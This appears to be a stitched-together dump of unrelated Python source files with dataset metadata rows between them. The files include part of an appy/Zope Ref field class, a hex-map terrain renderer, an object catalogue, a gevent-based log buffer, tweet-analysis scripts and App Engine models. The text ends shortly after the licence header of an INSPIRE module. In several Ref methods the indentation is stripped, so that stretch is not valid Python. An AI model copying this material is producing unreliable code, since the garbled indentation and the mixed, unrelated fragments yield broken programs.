        # the object will be created automatically, and no creation form will
        # be presented to the user.
        self.noForm = noForm
        # May the user link existing objects through this ref?
        self.link = link
        # May the user unlink existing objects?
        self.unlink = unlink
        if unlink == None:
            # By default, one may unlink objects via a Ref for which one can
            # link objects.
            self.unlink = bool(self.link)
        self.back = None
        if back:
            # It is a forward reference
            self.isBack = False
            # Initialise the backward reference: wire the two Ref instances
            # to each other (and to each other's __dict__ for fast access).
            self.back = back
            self.backd = back.__dict__
            back.isBack = True
            back.back = self
            back.backd = self.__dict__
            # klass may be None in the case we are defining an auto-Ref to the
            # same class as the class where this field is defined. In this case,
            # when defining the field within the class, write
            # myField = Ref(None, ...)
            # and, at the end of the class definition (name it K), write:
            # K.myField.klass = K
            # setattr(K, K.myField.back.attribute, K.myField.back)
            if klass: setattr(klass, back.attribute, back)
        # When displaying a tabular list of referenced objects, must we show
        # the table headers?
        self.showHeaders = showHeaders
        # When displaying referenced object(s), we will display its title + all
        # other fields whose names are listed in the following attribute.
        self.shownInfo = list(shownInfo)
        if not self.shownInfo: self.shownInfo.append('title')
        # If a method is defined in this field "select", it will be used to
        # filter the list of available tied objects.
        self.select = select
        # Maximum number of referenced objects shown at once.
        self.maxPerPage = maxPerPage
        # Per-layout ajax-synchronisation flags forwarded to Field.__init__
        # -- presumably "render via ajax on view, inline on edit"; confirm
        # against the Field base class.
        sync = {'view': False, 'edit':True}
        # If param p_queryable is True, the user will be able to perform queries
        # from the UI within referenced objects.
        self.queryable = queryable
        # Here is the list of fields that will appear on the search screen.
        # If None is specified, by default we take every indexed field
        # defined on referenced objects' class.
        self.queryFields = queryFields
        # The search screen will have this number of columns
        self.queryNbCols = queryNbCols
        # Within the portlet, will referred elements appear ?
        self.navigable = navigable
        # The search select method is used if self.indexed is True. In this
        # case, we need to know among which values we can search on this field,
        # in the search screen. Those values are returned by self.searchSelect,
        # which must be a static method accepting the tool as single arg.
        self.searchSelect = searchSelect
        # If changeOrder is False, then even if the user has the right to
        # modify the field, it will not be possible to move or sort objects.
        self.changeOrder = changeOrder
        Field.__init__(self, validator, multiplicity, default, show, page,
                       group, layouts, move, indexed, False,
                       specificReadPermission, specificWritePermission, width,
                       height, None, colspan, master, masterValue, focus,
                       historized, sync, mapping, label, sdefault, scolspan,
                       swidth, sheight)
        # A Ref can only be validated when the user links objects through it.
        self.validable = self.link
    def getDefaultLayouts(self):
        # Default layouts for a Ref: on "view", a full-width table layout; on
        # "edit", the standard layout string. (The meaning of the layout
        # strings 'l-f' and 'lrv-f' is defined by appy's layout machinery.)
        return {'view': Table('l-f', width='100%'), 'edit': 'lrv-f'}
    def isShowable(self, obj, layoutType):
        '''May this Ref field be shown on p_obj for p_layoutType? Applies the
           generic Field visibility rules first, then Ref-specific ones.'''
        res = Field.isShowable(self, obj, layoutType)
        if not res: return res
        # We add here specific Ref rules for preventing to show the field under
        # some inappropriate circumstances.
        # On "edit", hide the field when objects are created through it
        # (mayAdd) or when it is not a "link" Ref: in both cases there is
        # nothing to edit via a listbox.
        if (layoutType == 'edit') and \
           (self.mayAdd(obj) or not self.link): return False
        if self.isBack:
            # A back Ref is never editable; on other layouts it is shown only
            # when p_obj actually stores tied objects (truthiness of the list).
            if layoutType == 'edit': return False
            else: return getattr(obj.aq_base, self.name, None)
        return res
    def getValue(self, obj, type='objects', noListIfSingleObj=False,
                 startNumber=None, someObjects=False):
        '''Returns the objects linked to p_obj through this Ref field.
           - If p_type is "objects", it returns the Appy wrappers;
           - If p_type is "zobjects", it returns the Zope objects;
           - If p_type is "uids", it returns UIDs of objects (= strings).
           * If p_startNumber is None, it returns all referred objects.
           * If p_startNumber is a number, it returns self.maxPerPage objects,
             starting at p_startNumber.
           If p_noListIfSingleObj is True, it returns the single reference as
           an object and not as a list.
           If p_someObjects is True, it returns an instance of SomeObjects
           instead of returning a list of references.'''
        uids = getattr(obj.aq_base, self.name, [])
        if not uids:
            # Maybe is there a default value?
            defValue = Field.getValue(self, obj)
            if defValue:
                # I must prefix call to function "type" with "__builtins__"
                # because this name was overridden by a method parameter.
                # NOTE(review): "__builtins__" is a dict in imported modules
                # but a module in __main__; this only works when this file is
                # imported — confirm.
                if __builtins__['type'](defValue) in sutils.sequenceTypes:
                    uids = [o.o.UID() for o in defValue]
                else:
                    uids = [defValue.o.UID()]
        # Prepare the result: an instance of SomeObjects, that will be unwrapped
        # if not required.
        res = gutils.SomeObjects()
        res.totalNumber = res.batchSize = len(uids)
        batchNeeded = startNumber != None
        if batchNeeded:
            # Only one batch of (at most) self.maxPerPage objects is walked.
            res.batchSize = self.maxPerPage
        if startNumber != None:
            res.startNumber = startNumber
        # Get the objects given their uids
        i = res.startNumber
        while i < (res.startNumber + res.batchSize):
            if i >= res.totalNumber: break
            # Retrieve every reference in the correct format according to p_type
            if type == 'uids':
                ref = uids[i]
            else:
                ref = obj.getTool().getObject(uids[i])
                if type == 'objects':
                    ref = ref.appy()
            res.objects.append(ref)
            i += 1
        # Manage parameter p_noListIfSingleObj: unwrap only when the field's
        # max multiplicity is exactly 1.
        if res.objects and noListIfSingleObj:
            if self.multiplicity[1] == 1:
                res.objects = res.objects[0]
        if someObjects: return res
        return res.objects
def getLinkedObjects(self, obj, startNumber=None):
'''Gets the objects linked to p_obj via this Ref field. If p_startNumber
is None, all linked objects are returned. If p_startNumber is a
number, self.maxPerPage objects will be returned, starting at
p_startNumber.'''
return self.getValue(obj, type='zobjects', someObjects=True,
startNumber=startNumber)
def getFormattedValue(self, obj, value, showChanges=False):
return value
def getIndexType(self): return 'ListIndex'
def getIndexValue(self, obj, forSearch=False):
'''Value for indexing is the list of UIDs of linked objects. If
p_forSearch is True, it will return a list of the linked objects'
titles instead.'''
if not forSearch:
res = getattr(obj.aq_base, self.name, [])
if res:
# The index does not like persistent lists.
res = list(res)
else:
# Ugly catalog: if I return an empty list, the previous value
# is kept.
res.append('')
return res
else:
# For the global search: return linked objects' titles.
res = [o.title for o in self.getValue(type='objects')]
if not res: res.append('')
return res
    def validateValue(self, obj, value):
        '''Checks multiplicities for p_value. Returns None when the value is
           acceptable, or a translated error message otherwise.'''
        if not self.link: return None
        # We only check "link" Refs because in edit views, "add" Refs are
        # not visible. So if we check "add" Refs, on an "edit" view we will
        # believe that there is no referred object even if there is.
        # If the field is a reference, we must ensure itself that multiplicities
        # are enforced.
        # Count the number of references in p_value: it can be empty, a single
        # UID (a string) or a list of UIDs.
        if not value:
            nbOfRefs = 0
        elif isinstance(value, basestring):
            nbOfRefs = 1
        else:
            nbOfRefs = len(value)
        minRef = self.multiplicity[0]
        maxRef = self.multiplicity[1]
        # "None" as max multiplicity means "unlimited".
        # (basestring and sys.maxint are Python 2-only names.)
        if maxRef == None:
            maxRef = sys.maxint
        if nbOfRefs < minRef:
            return obj.translate('min_ref_violated')
        elif nbOfRefs > maxRef:
            return obj.translate('max_ref_violated')
    def linkObject(self, obj, value, back=False):
        '''This method links p_value (which can be a list of objects) to p_obj
           through this Ref field. When p_back is True, we are updating the
           back reference and must not recurse again.'''
        # p_value can be a list of objects
        if type(value) in sutils.sequenceTypes:
            for v in value: self.linkObject(obj, v, back=back)
            return
        # Gets the list of referred objects (=list of uids), or create it.
        obj = obj.o
        refs = getattr(obj.aq_base, self.name, None)
        if refs == None:
            # Use a PersistentList so mutations are tracked by the ZODB.
            refs = obj.getProductConfig().PersistentList()
            setattr(obj, self.name, refs)
        # Insert p_value into it.
        uid = value.o.UID()
        if uid not in refs:
            # Where must we insert the object? At the start? At the end?
            # self.add may be a method computing the answer on p_obj.
            if callable(self.add):
                add = self.callMethod(obj, self.add)
            else:
                add = self.add
            if add == 'start':
                refs.insert(0, uid)
            else:
                refs.append(uid)
            # Update the back reference
            if not back: self.back.linkObject(value, obj, back=True)
    def unlinkObject(self, obj, value, back=False):
        '''This method unlinks p_value (which can be a list of objects) from
           p_obj through this Ref field. When p_back is True, we are updating
           the back reference and must not recurse again.'''
        # p_value can be a list of objects
        if type(value) in sutils.sequenceTypes:
            for v in value: self.unlinkObject(obj, v, back=back)
            return
        obj = obj.o
        refs = getattr(obj.aq_base, self.name, None)
        # Nothing to do when p_obj holds no reference at all.
        if not refs: return
        # Unlink p_value
        uid = value.o.UID()
        if uid in refs:
            refs.remove(uid)
            # Update the back reference
            if not back: self.back.unlinkObject(value, obj, back=True)
    def store(self, obj, value):
        '''Stores on p_obj, the p_value, which can be:
           * None;
           * an object UID (=string);
           * a list of object UIDs (=list of strings). Generally, UIDs or lists
             of UIDs come from Ref fields with link:True edited through the web;
           * a Zope object;
           * a Appy object;
           * a list of Appy or Zope objects.'''
        # Standardize p_value into a list of Zope objects
        objects = value
        if not objects: objects = []
        if type(objects) not in sutils.sequenceTypes: objects = [objects]
        tool = obj.getTool()
        for i in range(len(objects)):
            if isinstance(objects[i], basestring):
                # We have a UID here
                objects[i] = tool.getObject(objects[i])
            else:
                # Be sure to have a Zope object
                objects[i] = objects[i].o
        uids = [o.UID() for o in objects]
        # Unlink objects that are not referred anymore
        refs = getattr(obj.aq_base, self.name, None)
        if refs:
            # Walk backwards: unlinkObject removes entries from "refs", so a
            # forward walk would skip elements.
            i = len(refs)-1
            while i >= 0:
                if refs[i] not in uids:
                    # Object having this UID must unlink p_obj
                    self.back.unlinkObject(tool.getObject(refs[i]), obj)
                i -= 1
        # Link new objects
        if objects:
            self.linkObject(obj, objects)
    def mayAdd(self, obj):
        '''May the user create a new referred object from p_obj via this Ref?
           Returns True, or a falsy No instance carrying the refusal reason.'''
        # We can't (yet) do that on back references.
        if self.isBack: return No('is_back')
        # Check if this Ref is addable (self.add may be a method computed on
        # p_obj).
        if callable(self.add):
            add = self.callMethod(obj, self.add)
        else:
            add = self.add
        if not add: return No('no_add')
        # Have we reached the maximum number of referred elements?
        if self.multiplicity[1] != None:
            refCount = len(getattr(obj, self.name, ()))
            if refCount >= self.multiplicity[1]: return No('max_reached')
        # May the user edit this Ref field?
        if not obj.allows(self.writePermission): return No('no_write_perm')
        # Have the user the correct add permission?
        tool = obj.getTool()
        addPermission = '%s: Add %s' % (tool.getAppName(),
                                        tool.getPortalType(self.klass))
        folder = obj.getCreateFolder()
        if not obj.getUser().has_permission(addPermission, folder):
            return No('no_add_perm')
        return True
def checkAdd(self, obj):
'''Compute m_mayAdd above, and raise an Unauthorized exception if
m_mayAdd returns False.'''
may = self.mayAdd(obj)
if not may:
from AccessControl import Unauthorized
raise Unauthorized("User can't write Ref field '%s' (%s)." % \
(self.name, may.msg))
def changeOrderEnabled(self, obj):
'''Is changeOrder enabled?'''
if isinstance(self.changeOrder, bool):
return self.changeOrder
else:
return self.callMethod(obj, self.changeOrder)
def getSelectableObjects(self, obj):
'''This method returns the list of all objects that can be selected to
be linked as references to p_obj via p_self.'''
if not self.select:
# No select method has been defined: we must retrieve all objects
# of the referred type that the user is allowed to access.
return obj.search(self.klass)
else:
return self.select(obj)
xhtmlToText = re.compile('<.*?>', re.S)
def getReferenceLabel(self, refObject):
'''p_self must have link=True. I need to display, on an edit view, the
p_refObject in the listbox that will allow the user to choose which
object(s) to link through the Ref. The information to display may
only be the object title or more if self.shownInfo is used.'''
res = ''
for fieldName in self.shownInfo:
refType = refObject.o.getAppyType(fieldName)
value = getattr(refObject, fieldName)
value = refType.getFormattedValue(refObject.o, value)
if refType.type == 'String':
if refType.format == 2:
value = self.xhtmlToText.sub(' ', value)
elif type(value) in sequenceTypes:
value = ', '.join(value)
prefix = ''
if res:
prefix = ' | '
res += prefix + value
maxWidth = self.width or 30
if len(res) > maxWidth:
res = res[:maxWidth-2] + '...'
return res
def getIndexOf(self, obj, refObj):
'''Gets the position of p_refObj within this field on p_obj.'''
uids = getattr(obj.aq_base, self.name, None)
if not uids: raise IndexError()
return uids.index(refObj.UID())
def autoref(klass, field):
    '''Declares p_field, a Ref, as a reference to p_klass itself.
       A self-reference can't be written the usual way:
           class A:
               attr1 = Ref(A)
       because class A does not exist yet when "Ref(A)" is evaluated.
       Instead, write:
           class A:
               attr1 = Ref(None)
           autoref(A, A.attr1)
    '''
    # Tie the forward Ref to the class, then expose the back Ref on it.
    field.klass = klass
    back = field.back
    setattr(klass, back.attribute, back)
# ------------------------------------------------------------------------------
|
UTF-8
|
Python
| false | false | 2,014 |
17,239,998,738,636 |
cab00fde249d7534a8ec6102e7a0e6daf1d5a358
|
59b0eb9e358107606a7a51e4c6da8f37f76a5ec1
|
/python/src/hexmapview/superhexterrain.py
|
534cb0e15f329bc0903841cfbe315ff120734e2c
|
[
"LGPL-2.1-or-later"
] |
non_permissive
|
markllama/hexgame-research
|
https://github.com/markllama/hexgame-research
|
4a88be4ebcac7c033a4ea682fca4371ce5be6f53
|
c88a1c77c5333c55b55d76098fa342165b896024
|
refs/heads/master
| 2020-12-24T14:00:39.489091 | 2013-12-30T01:43:39 | 2013-12-30T01:43:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from terrain import Terrain
class SuperHex(Terrain):
    """Terrain renderer drawing a hex whose vertices are the centers of the
    location's neighboring hexes."""

    def repaint_location(self, loc):
        """Draw the polygon for p_loc onto the map canvas.

        The polygon's vertices are the pixel centers of loc's neighbors,
        flattened into a single [x0, y0, x1, y1, ...] coordinate list as the
        canvas API expects.
        """
        # Fix: the original also computed self._map.hexcenter(loc) into a
        # "center" local that was never used; that dead call was removed.
        coordinates = []
        for neighbor in loc.neighbors:
            vertex = self._map.hexcenter(neighbor)
            coordinates.extend([vertex.x, vertex.y])
        self._map.create_polygon(
            coordinates,
            fill="white",
            outline="black",
            tag=[self.name, "terrain", "(%d,%d)" % (loc.hx, loc.hy)]
        )
|
UTF-8
|
Python
| false | false | 2,013 |
18,339,510,369,374 |
971b6e9e0b4b89ae6a658c4697a8ce66240b7d44
|
3d0c4321f86c3d875f449771245249bf458c3ade
|
/src/Enviroment/Objects.py
|
406bdec4ff395d8421eb362fb8b3a236a5756f5b
|
[] |
no_license
|
jakubkotrla/spacemap
|
https://github.com/jakubkotrla/spacemap
|
630bfea057afcef46b93cfe06450a9e6d7a78cab
|
08f27a285d742971806aef88b914316c3d3785b3
|
refs/heads/master
| 2021-01-10T10:29:42.144969 | 2009-04-17T06:20:34 | 2009-04-17T06:20:34 | 45,355,817 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
## @package Enviroment.Objects
# Contains list of object types available for worlds.
from Enviroment.Affordances import *
## Represents type of object, has affordances.
class Object:
    ## Represents a type of object; carries a name and a list of affordances.
    def __init__(self, name, affs=None):
        # Bug fix: the former mutable default "affs=[]" was shared across
        # every Object created without an explicit affordance list, so
        # mutating one object's affordances leaked into all the others.
        self.name = name
        self.affordances = affs if affs is not None else []

    ## Returns "name (aff1, aff2, )", listing this type's affordance names.
    def ToString(self):
        strAff = ""
        for aff in self.affordances: strAff = strAff + aff.name + ", "
        return self.name + " (" + strAff + ")"
# Configuration part
# Catalogue of object types and their affordances.
WaypointObject = Object('Waypoint', [])
Meal = Object('Meal', [Eatability])
Sandwich = Object('Sandwich', [Eatability])
Apple = Object('Apple', [Eatability, Throwability])
Orange = Object('Orange', [Eatability, Throwability])
Sink = Object('Sink', [Wetability, Repairability])
Plate = Object('Plate', [Washability])
Cup = Object('Cup', [Washability])
Fork = Object('Fork', [Washability])
Knife = Object('Knife', [Washability, Cutability])
Pot = Object('Pot', [Washability])
Cover = Object('Cover', [Washability])
Book = Object('Book', [Readability])
Journal = Object('Journal', [Readability])
Newspapers = Object('Newspapers', [Readability])
Glasses = Object('Glasses', [Zoomability])
CocaColaCan = Object('CocaColaCan', [Drinkability])
BottleOfWine = Object('BottleOfWine', [Drinkability])
Television = Object('Television', [Watchability, Repairability])
Painting = Object('Painting', [Watchability])
Photoalbum = Object('Photoalbum', [Watchability])
Video = Object('Video', [Watchability, Repairability])
Flower = Object('Flower', [Watchability])
Chess = Object('Chess', [Playability])
Cards = Object('Cards', [Playability])
GameBoy = Object('GameBoy', [Playability])
Sofa = Object('Sofa', [Sitability])
Armchair = Object('Armchair', [Sitability])
Chair = Object('Chair', [Sitability])
Table = Object('Table', [Placeability, Repairability])
Shelf = Object('Shelf', [Placeability, Repairability])
Box = Object('Box', [Placeability, Repairability])
Door = Object('Door', [Exitability])
Hammer = Object('Hammer', [Hammerability])
Nail = Object('Nail', [Nailability])
Screwdriver = Object('Screwdriver', [Screwability])
Pipe = Object('Pipe', [Smokeability])
Wood = Object('Wood', [Fireability])
Torch = Object('Torch', [Lightability])

## List of all available object types.
# NOTE(review): WaypointObject, Chess, Cards, GameBoy and Chair are defined
# above but absent from this list — confirm whether the omission is intended.
Objects = [
  Meal,
  Sandwich,
  Apple,
  Orange,
  Sink,
  Plate,
  Cup,
  Fork,
  Knife,
  Pot,
  Cover,
  Book,
  Journal,
  Newspapers,
  Glasses,
  CocaColaCan,
  BottleOfWine,
  Television,
  Painting,
  Photoalbum,
  Video,
  Flower,
  Sofa,
  Armchair,
  Table,
  Shelf,
  Box,
  Door,
  Hammer,
  Nail,
  Screwdriver,
  Pipe,
  Wood,
  Torch
]
|
UTF-8
|
Python
| false | false | 2,009 |
13,451,837,610,383 |
1983cd225a8f5ee759c766bc713a5ce9a1bfdc1b
|
00abec481ba825ea9ee854c88e5a06143b871e23
|
/fluenpy/buffer.py
|
aff7e61dcdbdf45d7954c00022be7d8c5fe4ab8f
|
[] |
no_license
|
tagomoris/fluenpy
|
https://github.com/tagomoris/fluenpy
|
3c4d6060f12a8b3eb4a93e47694ea4f7705c8c11
|
730b7a934f4a35a887bcc3f102b7dbdbf359fa87
|
refs/heads/master
| 2021-01-15T19:13:37.057741 | 2012-04-30T07:19:32 | 2012-04-30T07:19:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
"""
fluenpy.buffer
~~~~~~~~~~~~~~
:copyright: (c) 2012 by INADA Naoki
:license: Apache v2
"""
from __future__ import print_function, division, absolute_import, with_statement
import logging
log = logging.getLogger(__name__)
from fluenpy import error
from fluenpy.config import Configurable, config_param
from collections import defaultdict
import gevent.queue as gqueue
import gevent
class BaseBufferChunk(object):
    """Abstract chunk of buffered data, keyed by *key*.

    Subclasses must implement ``__iadd__`` and ``__len__``; ``purge`` may be
    overridden to release resources when a chunk is thrown away.
    """
    def __init__(self, key):
        self.key = key

    def __iadd__(self, data):
        """Append *data* to this chunk."""
        # Bug fix: "raise NotImplemented" raised a TypeError because
        # NotImplemented is a sentinel value, not an exception class.
        raise NotImplementedError

    def __len__(self):
        """Return bytesize of this chunk."""
        raise NotImplementedError

    def purge(self):
        """Called when throwing away this chunk."""
        pass
class BaseBuffer(Configurable):
    '''Base class for fluentd-style output buffers: accumulates per-key
    chunks in a map, and periodically moves full/flushed chunks onto a
    bounded queue consumed by an output plugin.'''
    # Configurable limits (parsed from the plugin configuration).
    buffer_chunk_limit = config_param('size', 128*1024*1024)
    buffer_queue_limit = config_param('integer', 128)
    flush_interval = config_param('time', 1)
    _shutdown = False
    # Override this with the concrete chunk class (a BaseBufferChunk subclass).
    chunk_class = None
    def start(self):
        '''Initializes the queue/map and spawns the periodic flusher.'''
        self._queue = gqueue.Queue(self.buffer_queue_limit)
        # NOTE(review): chunk_class.__init__ takes a key argument, so the
        # defaultdict factory would fail if triggered; in practice the map is
        # only accessed via .get()/explicit assignment below — confirm.
        self._map = defaultdict(self.chunk_class)
        gevent.spawn(self.run)
    def run(self):
        '''Flush loop: flushes every self.flush_interval seconds until
        shutdown.'''
        while not self._shutdown:
            # TODO: subtract the time spent flushing from the next sleep
            # interval. (Translated from the original Japanese comment.)
            gevent.sleep(self.flush_interval)
            self.flush()
    def emit(self, key, data, chain):
        '''Appends p_data to the chunk for p_key. Returns True when the queue
        transitioned from empty to non-empty (presumably a hint for the
        caller to schedule a flush — confirm against callers).'''
        top = self._map.get(key)
        if not top:
            top = self._map[key] = self.chunk_class(key)
        if len(top) + len(data) <= self.buffer_chunk_limit:
            # The data still fits in the current chunk.
            chain.next()
            top += data
            return False
        if len(data) > self.buffer_chunk_limit:
            log.warn("Size of the emitted data exceeds buffer_chunk_limit.\n"
                     "This may occur problems in the output plugins ``at this server.``\n"
                     "To avoid problems, set a smaller number to the buffer_chunk_limit\n"
                     "in the forward output ``at the log forwarding server.``"
                     )
        # The current chunk is full: enqueue it and start a new one for p_key.
        nc = self.chunk_class(key)
        try:
            nc += data
            self._queue.put_nowait(top)
            self._map[key] = nc
            chain.next() # Commit the caller's callback chain (fluentd-style).
            return self._queue.qsize() == 1
        except gqueue.Full:
            log.error("buffer_queue_limit is exceeded.")
            nc.purge()
        except:
            # Bare except: purge the half-built chunk, then re-raise.
            nc.purge()
            raise
    def keys(self):
        # Keys of the chunks currently being filled.
        return self._map.keys()
    def flush(self):
        '''Moves every in-progress chunk from the map onto the queue.'''
        log.debug("flush: keys=%s", self._map.keys())
        map_ = self._map
        keys = list(map_.keys())
        for key in keys:
            chunk = map_.pop(key)
            self._queue.put(chunk) # Would block here.
        log.debug("flush: queue=%s", self._queue.qsize())
    def get(self, block=True, timeout=None):
        # Pop the next flushed chunk from the queue.
        return self._queue.get(block, timeout)
    def get_nowait(self):
        return self._queue.get_nowait()
    def shutdown(self):
        '''Stops the flush loop and flushes remaining chunks.'''
        self._shutdown = True
        self.flush()
|
UTF-8
|
Python
| false | false | 2,012 |
4,930,622,487,731 |
0bbbbb761fc65daa2b597a485c9ebf8c94ca48d4
|
0e1f85ec1aec20e2ac42bae81c59d809b6a3abfa
|
/analyzer/base.py
|
160955f7dbdad424bb4d5fb32a949a09d6dd99ca
|
[] |
no_license
|
canerturkmen/tweetcrawl
|
https://github.com/canerturkmen/tweetcrawl
|
4e44be8fb4e5bed22d1d33c47c17361fd0e5eaef
|
778957c2924ba95cecd3659ab706a19b1199b685
|
refs/heads/master
| 2016-09-06T00:43:59.384907 | 2013-08-03T07:02:14 | 2013-08-03T07:02:14 | 11,071,716 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
Analysis for CSV data dumped out of mongodb
"""
import copy
import csv
import random
import re
import sys
# ['created_at', 'entities.hashtags', 'favorite_count', 'text', 'retweet_count', 'user.id', 'user.screen_name']
def revise_norm_1():
    """Placeholder pass over norm.csv: opens the input and the output file and
    iterates every input row without writing anything (the revision logic is
    not implemented yet)."""
    with open('/Users/Caner/Desktop/norm.csv') as read:
        with open('/Users/Caner/Desktop/norm2.csv', 'wb') as out:
            reader = csv.reader(read, delimiter=',', quotechar='"')
            writer = csv.writer(out, delimiter=',', quoting=csv.QUOTE_MINIMAL)
            for _row in reader:
                pass
def generate_norm_1():
    """Builds a normalized (user, doc-index, word) sample from the tweet dump
    and a binary term-document matrix.

    Steps: load Turkish stopwords; group tweet texts by user (column 5);
    randomly sample 1000 users; tokenize each of their tweets (links,
    stopwords, @-mentions and short tokens removed); write one
    [user, doc-index, word] row per token to norm_sample8.csv; finally write
    a 0/1 user-by-word matrix to mx_out4.csv. Python 2 only (print
    statements); paths are hard-coded.
    """
    users = {}
    sw = []
    with open('/Users/Caner/Downloads/stop-words/stop-words-turkish.txt') as words:
        reader = csv.reader(words)
        for r in reader:
            sw.append(r[0])
    results = []
    vocab = {}  # NOTE(review): never used afterwards.
    print sw
    with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
        with open('/Users/Caner/Desktop/norm_sample8.csv', 'wb') as out:
            reader = csv.reader(file, delimiter=",", quotechar='"')
            writer = csv.writer(out , delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL)
            # Group tweet texts (column 3) by user id (column 5).
            for r in reader:
                if not users.get(r[5]):
                    users[r[5]] = []
                    users[r[5]].append(r[3])
                else:
                    users[r[5]].append(r[3])
            user_sample = random.sample(users.keys(), 1000)
            i = 0
            for key in user_sample:
                for a in users.get(key):
                    txt = re.sub(r'(http\S*)', '', a) # take out links
                    txt = re.sub("\n", " ", txt)
                    txt = re.sub("\t", " ", txt)
                    # Split on punctuation/whitespace delimiters.
                    rex = re.compile(r'[,|.|!|\?| |;|\||\'|\"|\)|\(|:]')
                    wordlist = rex.split(txt)
                    wordlist2 = []
                    for w in wordlist:
                        if w not in sw and len(w) > 2 and w[0] != "@": # take out stopwords
                            wordlist2.append(w.lower())
                    for w in wordlist2:
                        a = [key, i, w]
                        results.append(a)
                        writer.writerow(a)
                i+=1
    # Build the vocabulary (all words seen), then a 0/1 matrix per user.
    total_vocab = {}
    for r in results:
        total_vocab[r[2]] = 0
    matrix = {}
    for r in results:
        if not matrix.get(r[0]):
            matrix[r[0]] = copy.copy(total_vocab)
        matrix[r[0]][r[2]] = 1
    with open('/Users/Caner/Desktop/mx_out4.csv', 'wb') as outmatrix:
        matrixwriter = csv.writer(outmatrix, delimiter=',',quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for m in matrix:
            row = []
            # Columns in sorted-vocabulary order.
            for i in sorted(total_vocab.keys()):
                row.append(matrix.get(m).get(i))
            matrixwriter.writerow(row)
def learn_dates():
    """
    Get unique dates in the csv dump (Python 2; prints them to stdout).
    """
    ls = {}  # dict used as a set of date strings
    with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
        reader = csv.reader(file, delimiter=",", quotechar='"')
        for r in reader:
            # Mon Jul 22 19:59:01 +0000 2013
            # Chars [4:10] of the timestamp extract the "Jul 22" part.
            ls[r[0][4:10]] = ""
    print ls.keys()
def get_unique_users():
"""
Number of unique users who tweeted
"""
ls = {}
with open("/Users/Caner/Scrapes/tweet/tweets.csv") as file:
reader = csv.reader(file, delimiter=",", quotechar='"')
for r in reader:
# Mon Jul 22 19:59:01 +0000 2013
#ls[r[0][4:10]] = ""
ls[r[0]] = ""
print len(reader)
# Script entry point: build the user/word sample and term-document matrix,
# then report completion.
generate_norm_1()
print "Done"
|
UTF-8
|
Python
| false | false | 2,013 |
7,164,005,489,721 |
dc92b5505e0fa350d0eb4857f0be8b400d138b48
|
e9185cc2c7a053e4088ba20ee294e931d378f338
|
/loader/models.py
|
33006bf7568df51a3e61063776f3949c50e7b89f
|
[] |
no_license
|
19/kavak
|
https://github.com/19/kavak
|
a93103d38ff2be4165c29d30819a991f971295c0
|
5c4d9d7e7839dde9a1ba667d027d6a1257c643aa
|
refs/heads/master
| 2015-08-02T04:57:13.962548 | 2013-06-09T19:25:47 | 2013-06-09T19:25:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from google.appengine.ext import db
class Person(db.Model):
    # App Engine datastore model for a person. All fields are free-form
    # strings (including GradeAverage — presumably numeric; confirm).
    Email = db.StringProperty()
    Role = db.StringProperty()
    FirstName = db.StringProperty()
    LastName = db.StringProperty()
    Gid = db.StringProperty()
    GradeAverage = db.StringProperty()
class Project(db.Model):
    # App Engine datastore model for a project; Scount is stored as a string.
    Name = db.StringProperty()
    Scount = db.StringProperty()
|
UTF-8
|
Python
| false | false | 2,013 |
2,345,052,172,434 |
ad2349db391acfc5657289818aac0b986dd217ea
|
a346794889f7c8246742772dc56ee6404b78c3f6
|
/python/lxilff/dev.py
|
6f714f47e3e9227d271e86889ed8e1b43d62b354
|
[] |
no_license
|
lusionx/lusionkit
|
https://github.com/lusionx/lusionkit
|
cd415371350be35ca6d98ff86230ed7aa51e20b6
|
2a5fd1f302201913c9489c63afe5db635366c83c
|
refs/heads/master
| 2021-01-21T11:45:16.314068 | 2013-05-17T06:01:36 | 2013-05-17T06:01:36 | 32,775,770 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#!/usr/bin/env python
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
import web3
from google.appengine.ext.db import djangoforms
from model import anime
class ItemForm(djangoforms.ModelForm):
    # Django-style form automatically generated from the anime.Main model.
    class Meta:
        model = anime.Main
# URL map: path -> handler class name (resolved by web3.run via globals()).
url = {}
url['/dev'] = 'MainHandler'
class MainHandler(webapp.RequestHandler):
    """Renders the auto-generated anime.Main form at /dev."""
    def get(self):
        form = ItemForm()
        # as_p() wraps each field in <p>...</p>; swap those tags for <div>s.
        markup = form.as_p()
        markup = markup.replace('<p>', '<div>')
        markup = markup.replace('</p>', '</div>')
        self.response.out.write(markup)
# WSGI entry point: dispatch requests using the url map defined above.
if __name__ == '__main__':
    web3.run(url,globals())
|
UTF-8
|
Python
| false | false | 2,013 |
7,430,293,457,918 |
3b88a821e4888333e393356317ae5e6cd05f810f
|
3b0d284ac8fe979e0ea8c5bfd6d4ed9228c52b69
|
/inspire/modules/deposit/workflows/literature.py
|
e7215dc993a3e635a528124044a9cf0be5810dba
|
[
"GPL-2.0-only"
] |
non_permissive
|
pedrogaudencio/inspire-next
|
https://github.com/pedrogaudencio/inspire-next
|
debb1583a290ddb02ce3969abe6b527f3c922190
|
13ede4ef80728f889b64966ee5214e1d438cc1ba
|
refs/heads/sprint-1
| 2021-01-14T14:22:49.135024 | 2014-05-27T15:21:15 | 2014-05-28T16:34:31 | 17,870,297 | 0 | 0 | null | true | 2014-06-18T14:13:39 | 2014-03-18T15:05:56 | 2014-06-18T14:13:26 | 2014-06-18T14:13:26 | 1,469 | 0 | 0 | 0 |
Python
| null | null |
#
## This file is part of INSPIRE.
## Copyright (C) 2014 CERN.
##
## INSPIRE is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## INSPIRE is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
from wtforms import validators
